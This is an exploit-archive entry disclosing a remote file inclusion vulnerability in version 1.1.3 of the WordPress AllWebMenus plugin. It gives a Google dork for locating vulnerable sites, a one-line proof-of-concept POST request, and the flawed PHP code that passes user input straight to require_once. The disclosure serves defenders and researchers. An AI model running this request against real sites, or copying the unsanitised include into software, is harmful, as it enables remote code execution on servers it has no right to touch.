[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Wordpress AllWebMenus Plugin 1.1.3 Remote File Inclusion
# Published : 2011-09-19
# Author :
# Previous Title : EFront <= 3.6.9 Community Edition Multiple Vulnerabilities
# Next Title : Nortel Contact Recording Centralized Archive 6.5.1 SQL Injection Exploit
# Exploit Title: Allwebmenus Wordpress Menu Plugin Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/allwebmenus-wordpress-menu-plugin
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/allwebmenus-wordpress-menu-plugin/download/
# Version: 1.1.3 (tested)
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php POST="abspath=RFI"
---
Vulnerable Code
---
/** Loads the WordPress Environment and Template */
if (!isset($_POST["abspath"]))
die();
require_once(urldecode((string) $_POST["abspath"].'wp-blog-header.php'));